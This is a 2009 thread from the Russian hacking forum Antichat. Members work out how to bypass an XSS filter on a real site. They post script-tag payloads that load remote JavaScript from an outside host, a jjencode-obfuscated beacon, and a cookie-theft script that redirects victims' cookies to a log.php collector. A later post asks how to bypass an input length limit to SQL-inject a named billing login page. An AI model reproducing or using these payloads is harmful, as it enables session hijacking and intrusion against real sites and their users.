Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.11.2009, 23:02
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
ставь одинарные кавычки
|
|
|
23.11.2009, 23:17
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Опять ставит фильтр
PHP код:
<SCRIPT type=\'text/javascript\' src=\'http://my_site.com/js.js\'></SCRIPT>
Последний раз редактировалось xofffff; 23.11.2009 в 23:22..
|
|
|
|
23.11.2009, 23:20
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
Сообщение от xofffff
Опять ставит фильтр
PHP код:
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
не уверен быдет ли пахать...
add:
http://sec-123.narod.ru/xss/HTML.txt
Последний раз редактировалось [Forest]; 23.11.2009 в 23:37..
|
|
|
|
24.11.2009, 00:11
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
Это к стати работает!
Последний раз редактировалось Ins3t; 24.11.2009 в 00:17..
|
|
|
|
24.11.2009, 00:25
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Pashkela
Зато меня искренне радует ваше внимание. Кстати, YuNi|[c - чей смит?  не понял что ты имел ввиду под красным!!!
Сообщение от Ins3t
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает! Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?
Последний раз редактировалось YuNi|[c; 24.11.2009 в 00:49..
|
|
|
|
24.11.2009, 00:28
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
2YuNi|[c, если ты закодируешь это потом в бейс64 или хэкс - то вообще ничего пахать не будет.
Инфа по сабжу:
http://raz0r.name/news/xss-filters-bypass-on-blackhat/
http://oxod.ru/2009/08/26/%D0%BE%D0%B1%D1%85%D0%BE%D0%B4-xss-%D1%84%D0%B8%D0%BB%D1%8C%D1%82%D1%80%D0%BE%D0%B2-%D0%BF%D0%BE-%D1%81%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%B0%D 0%BC-%D0%BE%D1%81%D0%BE%D0%B1%D0%B5%D0%BD%D0%BE%D1%81/
http://utf-8.jp/public/jjencode.html
|
|
|
|
24.11.2009, 01:12
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Сообщение от Ins3t
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает! No input file specified.
Написало когда ввел
Код:
?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script>
и куки написались в строке браузера но в base.php не сохранились 
В js.js у меня
PHP код:
location.href =www.site.h16.ru/cb/log.php? + document.cookie;
Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified.
Код:
http://hacksite.com/log.php?и тут cookie
Последний раз редактировалось xofffff; 24.11.2009 в 01:23..
|
|
|
|
24.11.2009, 06:46
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
http://bill.svtc.ru/initlogin.php?CardNumber=1&CardCode='
Помогите, незнаю как обойти количество символов 
Заранее спасибо |
|
|
|
24.11.2009, 07:26
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
В сурсе страницы рядом с name=CardCode изменяешь maxlength=12 на maxlength=999999. Только тольку с этого...
|
|
|
|
24.11.2009, 08:20
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
ну вот именно, как бы сделать скюль...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.jpg?1710550){kind=avatar}
![Аватар для [Forest]](/avatars/avatar103206.jpg?1710596){kind=avatar}
Похожие темы
Линейный вид
